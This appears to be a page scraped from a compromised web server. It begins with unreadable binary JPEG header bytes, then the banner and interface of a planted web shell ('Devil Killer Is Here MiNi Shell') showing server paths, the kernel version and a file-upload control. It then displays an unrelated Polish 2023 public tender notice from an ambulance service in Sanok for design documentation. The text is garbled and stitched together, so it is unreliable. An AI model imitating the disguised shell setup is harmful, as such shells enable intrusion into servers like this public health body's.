JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20230328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20230328/0015450001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo-kosztorysowej pn. „Centrum Ratownictwa siedziba Bieszczadzkiego Pogotowia Ratunkowego SPZOZ w Sanoku” wraz z pełnieniem nadzoru autorskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">BIESZCZADZKIE POGOTOWIE RATUNKOWE SPZOZ W SANOKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 380372046</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jezierskiego 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sanok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 13 46 284 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.pub@bieszczadzkiepogotowie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bpr-spzoz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo-kosztorysowej pn. „Centrum Ratownictwa siedziba Bieszczadzkiego Pogotowia Ratunkowego SPZOZ w Sanoku” wraz z pełnieniem nadzoru autorskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d3717924-c97c-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00154500</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00034577/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wykonanie dokumentacji projektowo-budowalnej budynek siedziby BPR SPZOZ w Sanoku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d3717924-c97c-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej w szczególności przekazywania wezwań i zawiadomień,<br/>zadawania pytań i udzielanie odpowiedzi wyjaśnień treści oferty i rażąco niskiej ceny.<br/>adres e-mail: zam.pub@bieszczadzkiepogotowie.pl ( nie dotyczy składania ofert).<br/>natomiast do elektronicznego składania ofert służy strona internetowa https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego<br/>zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się<br/>do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument<br/>z wszytym podpisem (typ wewnętrzny).<br/>Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020 poz. 2452)<br/>oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy e-zamówienia wynosi 150 Mb Minimalne wymagania<br/>techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji<br/>połączenia określa Regulamin Platformy e-Zamówienia (https://ezamowienia.gov.pl/pl/regulamin/<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej w szczególności przekazywania wezwań i zawiadomień,<br/>zadawania pytań i udzielanie odpowiedzi wyjaśnień treści oferty i rażąco niskiej ceny.<br/>adres e-mail: zam.pub@bieszczadzkiepogotowie.pl( nie dotyczy składania ofert)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Ogólnego Rozporządzenia o Ochronie Danych (RODO) informujemy, że:<br/>1) administratorem Państwa danych osobowych jest Bieszczadzkie Pogotowie Ratunkowe Sa-modzielnego Publicznego Zakład Opieki Zdrowotnej w Sanoku, adres: ul. Jezierskiego 21, 38-500 Sanok<br/>2) administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować w sprawach przetwarzania Państwa danych osobowych za pośrednictwem poczty elektronicz-nej: www.bieszczadzkiepogotowie.pl<br/>3) administrator będzie przetwarzał Państwa dane osobowe na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzonym postępowaniem o udzielenie zamówienia publicznego;<br/>4) dane osobowe mogą być udostępnione innym uprawnionym podmiotom, na podstawie przepi-sów prawa, a także podmiotom, z którymi administrator zawarł umowę w związku z realizacją usług na rzecz administratora (np. kancelarią prawną, dostawcą oprogramowania, zewnętrz-nym audytorem, zleceniobiorcą świadczącym usługę z zakresu ochrony danych osobowych). Odbiorcami Pani/Pana danych osobowych mogą osoby lub podmioty upoważnione na pod-stawie przepisów obowiązującego prawa. Odbiorcami danych będą również podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Pzp;<br/>5) administrator nie zamierza przekazywać Państwa danych osobowych do państwa trzeciego lub organizacji międzynarodowej;<br/>6) mają Państwo prawo uzyskać kopię swoich danych osobowych w siedzibie administratora.<br/>Dodatkowo zgodnie z art. 13 ust. 2 RODO informujemy, że:<br/>1) Państwa dane osobowe będą przetwarzane przez okres wskazany w ustawie Pzp albo w przy-padku zamówień realizowanych w ramach projektów (np. współfinansowanych ze środków Unii Europejskiej) przez okres wskazany w wytycznych w zakresie kwalifikowalności wydat-ków;<br/>2) przysługuje Państwu prawo dostępu do treści swoich danych, ich sprostowania lub ograni-czenia przetwarzania, a także prawo do wniesienia skargi do organu nadzorczego;<br/>3) podanie danych osobowych jest dobrowolne, jednakże niezbędne do realizacji ww. celu. Kon-sekwencje niepodania danych określa ustawa Pzp;<br/>4) administrator nie podejmuje decyzji w sposób zautomatyzowany w oparciu o Państwa dane osobowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BPR/TP/03/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 513887,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: wykonanie dokumentacji projektowo-kosztorysowej pn. „Centrum Ratownictwa siedziba Bieszczadzkiego Pogotowia Ratunkowego SPZOZ w Sanoku” jako budynku użyteczności publicznej spełniającego standardy budownictwa pasywnego wraz z pełnieniem nadzoru autorskiego podczas realizacji inwestycji.”<br/>2. Należy opracować wielobranżową dokumentację projektowo-kosztorysową w następującym<br/>zakresie obejmującym:<br/>2.1 Koncepcja.<br/>• koncepcja architektoniczna w dwóch wersjach (wizualizacje obiektu) wraz ze wstępnym kosztorysem.<br/>2.2 Ekspertyzy i opinie dotyczących między innymi:<br/>• ustalenia kategorii geotechnicznej warunków posadowienia,<br/>• warunków technicznych i wytycznych do projektowania,<br/>• warunków technicznych od gestorów sieci zewnętrznych (WOD-KAN, Energetycznej, Teletechnicznej)<br/>2.3 Projekt budowlany:<br/>• projekt/y zagospodarowania działki lub terenu<br/>• projekt/y architektoniczno-budowlany/e<br/>• projekt/y techniczny/e<br/>Zgodnie z Rozporządzaniem Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu<br/>i formy projektu budowlanego (Dz. U. 2020 poz. 1609)<br/>2.4 Projekt wykonawczy:<br/>Zgodnie z Rozporządzeniem Ministra Rozwoju i technologii z dnia 20 grudnia 2021 r. w sprawie<br/>szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru<br/>robót budowlanych oraz programu funkcjonalno-użytkowego<br/>2.5 Uzyskanie decyzji administracyjnych niezbędnych dla realizacji przedmiotowego zamówienia.<br/>2.6 Pełnienie nadzoru autorskiego.<br/><br/>3.	Szczegółowy opis przedmiotu zamówienia wraz z wymaganiami w zakresie jego realizacji oraz warunków gwarancji określają:<br/>2.1. Załącznik nr 1 do SWZ tj. Wzór Formularza ofertowego,<br/>2.2. Załącznik nr 2 do SWZ – formularz cenowy, opis przedmiotu zamówienia (OPZ, program funkcjonalno-użytkowy, inne dokumenty),<br/>2.3. Załącznik nr 4 do SWZ – Wzór umowy. <br/>Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze Umowy wraz z załącznikami, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">270 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">9.	Kryteria (w %) i ich opis:<br/>Nr: Nazwa kryterium: Waga:<br/>1 Cena (koszt) 60 %<br/><br/>2 Termin wykonania zamówienia-<br/> łączna suma z poniższych podkryteriów:	40%<br/>2.1 Termin wykonania koncepcji 5 %<br/>2.2 Termin wykonania projektu budowlanego wraz<br/>z niezbędnymi opiniami, uzgodnieniami lub innymi<br/>dokumentami wymaganymi przepisami w zakresie<br/>niezbędnym dla uzyskania pozwolenia na budowę lub<br/>wniosku o przyjęcie zgłoszenia robót do organu<br/>administracji architektoniczno-budowlanej<br/>i uzyskanie właściwych zgód na realizację	20 %<br/>2.3 Termin wykonania: projekty wykonawcze, specyfikacje<br/>techniczne wykonania i odbioru robót budowlanych,<br/>przedmiary robót, kosztorysy inwestorskie, informację<br/>dotyczącą bezpieczeństwa i ochrony zdrowia, opis<br/>przedmiotu zamówienia na realizację przedsięwzięcia,<br/>kompletną dokumentację w formie elektronicznej na<br/>nośniku CD oraz pozostałe elementy dokumentacji<br/>projektowej, nie wymienione do pozwolenia na budowę, a konieczne do wszczęcia procedury przetargowej na roboty budowlane i dostawę wyposażenia oraz prawi-dłowej realizacji i eksploatacji obiektów	15 %<br/><br/>1. Punkty przyznawane za podane wyżej kryteria będą liczone według następującego wzoru:<br/>Nr kryterium: Wzór:<br/>1 Cena (koszt)<br/>C= Cena najniższa x kryterium<br/> Cena badana<br/><br/>Punktacja przyznawana ofertom w powyższym kryterium będzie li-czona z dokładnością do dwóch miejsc po przecinku.<br/>2.1 Maksymalny termin wymagany przez Zamawiającego to 30 dni od dnia podpisania umowy.<br/>W przypadku gdy Wykonawca zaoferuje termin 20 dni lub mniej,<br/>oferta otrzyma 5 pkt.<br/>W przypadku gdy Wykonawca zaoferuje termin od 25 dni do 21 dni, oferta otrzyma 2 pkt.<br/>W przypadku gdy Wykonawca zaoferuje termin od 26 dni do 30 dni, oferta otrzyma 0 pkt.<br/>W sytuacji, gdy Wykonawca nie wskaże w ofercie terminu, oferta taka zostanie uznana za ofertę z maksymalnym okresem i w tym przypad-ku Wykonawca otrzyma 0 (zero) punktów za kryterium termin.<br/>2.2 Maksymalny termin wymagany przez Zamawiającego to 130 dni od dnia odbioru przez Zamawiającego wykonanej koncepcji<br/>W przypadku gdy Wykonawca zaoferuje termin 100 dni lub mniej, oferta otrzyma 20 pkt.<br/>W przypadku gdy Wykonawca zaoferuje termin od 101dni do 115 dni, oferta otrzyma 10 pkt.<br/>W przypadku gdy Wykonawca zaoferuje termin od 116dni do 125 dni, oferta otrzyma 5 pkt.<br/>W przypadku gdy Wykonawca zaoferuje termin od 126 dni do 130 dni, oferta otrzyma 0 pkt.<br/>W sytuacji, gdy Wykonawca nie wskaże w ofercie terminu, oferta taka zostanie uznana za ofertę z maksymalnym okresem i w tym przypad-ku Wykonawca otrzyma 0 (zero) punktów za kryterium termin.<br/><br/>2.3 Maksymalny termin wymagany przez Zamawiającego to 110 dni od<br/>dnia złożenia wniosku o wydanie pozwolenia na budowę lub wniosku<br/>o przyjęcie zgłoszenia robót do organu administracji architektoniczno-budowlanej i uzyskanie właściwych zgód na realizację, dostarczony Zamawiającemu.<br/>W przypadku gdy Wykonawca zaoferuje termin 70 dni i mniej,<br/>oferta otrzyma 15 pkt.<br/>W przypadku gdy Wykonawca zaoferuje termin od 71 dni do 90 dni, oferta otrzyma 10 pkt.<br/>W przypadku gdy Wykonawca zaoferuje termin od 91 dni do 110 dni, oferta otrzyma 0 pkt.<br/>W sytuacji, gdy Wykonawca nie wskaże w ofercie terminu, oferta taka zostanie uznana za ofertę z maksymalnym okresem i w tym przypad-ku Wykonawca otrzyma 0 (zero) punktów za kryterium termin.<br/>Ocena końcowa oferty (łączna ilość punktów):<br/>Ok = C + T<br/> gdzie:<br/>Ok – ocena końcowa oferty,<br/>C – ilość punktów za cenę,<br/>T –suma punktów za podkategorie termin (T/K +T/PB + T/PW)<br/>T/K – ilość punktów za termin wykonania koncepcji,<br/>T/PB – ilość punktów za termin wykonania projektu budowlanego,<br/>T/PW – ilość punktów za termin wykonania projektów wykonawczych<br/>10.W postępowaniu zwycięży oferta, która w wyniku oceny otrzyma najwyższą sumę punktów uzyskanych w poszczególnych kryteriach i spełni wszystkie wymogi zawarte w ustawie prawo zamówień publicznych i specyfikacji warunków zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia-</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> sytuacji ekonomicznej lub finansowej;<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem postępowania na sumę gwarancyjną w wysokości min. 500.000,00 zł brutto;<br/>zdolności technicznej lub zawodowej;<br/>1) Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że w ciągu ostatnich 3 lat przed upływem terminu składania ofert lub w okresie działalności – jeżeli jest krótszy niż 3 lata zrealizował zamówienie polegające na opracowaniu co najmniej dwóch usług wielobranżowych dokumentacji projektowo-kosztorysowej, <br/>w tym co najmniej jednej budynku pasywnego o wartości nie mniejszej niż 250 000,00 zł brutto PLN (dwieście pięćdziesiąt tysięcy), a drugiej o wartości nie mniejszej niż 150 000,00 zł brutto PLN (sto pięćdziesiąt tysięcy)<br/><br/>i potwierdzi ten fakt dowodem tj. Referencją bądź innym dokumentem , ( dokument powinien określać wartość i przedmiot dostaw, podmiot wystawiający dokument, ) lub oświadczeniem wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów<br/><br/>(Uwaga: przez usługę należy rozumieć usługę świadczoną na rzecz jednego zleceniodawcy<br/>w ramach jednej umowy, polegającą na wykonaniu wyżej opisanych zamówień)<br/><br/>2) Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia i będą odpowiedzialnymi za świadczenie usług oraz posiadającymi wymagane kwalifikacje zawodowe i doświadczenie, niezbędne do wykonywania zamówienia, tj.:<br/><br/>• Architekt/projektant (co najmniej 1 osoba), posiadająca co najmniej: 5 letnie doświadczenie oraz uprawnienia budowlane* w specjalności architektonicznej do projektowania bez ograniczeń, który wykonał co najmniej 2 usługi opracowania dokumentacji projektowej o podobnym charakterze.<br/><br/>• Projektant branży elektrycznej (co najmniej 1 osoba), posiadająca co najmniej:5 letnie doświadczenie oraz uprawnienia budowlane* w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do projektowania bez ograniczeń, który wykonał co najmniej 1 usługę opracowania<br/>dokumentacji projektowej obiektu wyposażonego w instalacje niskoprądowych systemów tzw. „inteligentnego budynku”, w tym:<br/> instalacji fotowoltaicznej,<br/> 